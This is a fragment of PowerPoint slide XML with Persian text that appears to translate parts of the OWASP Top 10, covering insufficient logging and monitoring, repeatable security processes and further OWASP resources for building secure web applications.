                        <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>۲</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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شیوع</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx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۳</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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابل کشف بودن</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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۱</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fa-IR" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تکنیکی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0"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۲</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gn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>اکسپلویت از نظارت و ثبت سیاهه ناکافی تقریبا بستر اصلی هر حادثه مهم است.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>مهاجمان به عدم نظارت و واکنش به موقع برای رسیدن به اهداف خود بدون شناسایی شدن متکی هستند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>این مسئله بر اساس نظرسنجی صنعتی، در </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>قرار دارد.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>یک استراتژی برای تعیین اینکه آیا شما نظارت کافی دارید بررسی کردن سیاهه های مربوط به تست نفوذ است. اقدامات تست کنندگان باید به اندازه کافی ثبت شود تا بدانند که چه آسیبی به آنها وارد شده است.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>بیشترین حملات موفقیت آمیز با شناسایی آسیب پذیری آغاز می شود. اجازه دادن به این کاوشگرها برای ادامه می تواند احتمال اکسپلویت موفقیت آمیز را تا حدود 100 درصد افزایش دهد.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>در سال 2016، شناسایی یک شکاف (رخنه) به طور متوسط 191 روز طول کشید - زمان زیادی برای آسیب زدن) است.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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493376800"/>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584937">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>ایجاد و استفاده از فرآیندهای امنیتی تکراری و کنترل های امنیتی استاندارد</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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381463">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>این که آیا شما به امنیت برنامه های وب جدید یا در حال حاضر بسیار آشنا با این خطرات، کار ایجاد یک برنامه وب امن و یا تعمیر یک موجود می تواند دشوار است. اگر شما مجبور به مدیریت نمونه کارها بزرگ نرم افزار، این کار می تواند دلهره آور باشد.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>برای کمک به سازمان ها و توسعه دهندگان خطرات امنیتی برنامه خود را در یک روش مقرون به صرفه کاهش می دهد، </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>منابع متعددی از منابع آزاد و باز را که شما می توانید برای رسیدگی به امنیت نرم افزار در سازمان خود استفاده کنید، تولید کرده است. موارد زیر مواردی هستند که بسیاری از منابع </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> برای کمک به سازمان ها ایجاد برنامه های کاربردی وب و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>های کاربردی ایجاد کرده اند. در صفحه بعد، ما منابع اضافی </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> را ارائه می دهیم که می تواند سازمان ها را در تأیید امنیت برنامه ها و </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>API </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> های خود کمک کند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-7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latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>منابع متعدد اضافی </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>موجود برای استفاده شما وجود دارد. لطفا از صفحه پروژه </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP، </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>که تمام پروژه های </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>Flagship، Labs </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>و  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>Inkubator</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>را در فهرست موجودی پروژه </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>لیست می کند، بازدید کنید. اکثر منابع </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>در ویکی ما موجود است و بسیاری از اسناد </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>را می توان به صورت چاپی یا به عنوان کتاب های الکترونیکی سفارش داد.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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9399"/>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just" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>برای ایجاد یک برنامه وب امن، باید چه وسیله ای امن برای آن برنامه تعریف کنید. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                </a:rPr>
                <a:t>OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fa-IR" sz="1100" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
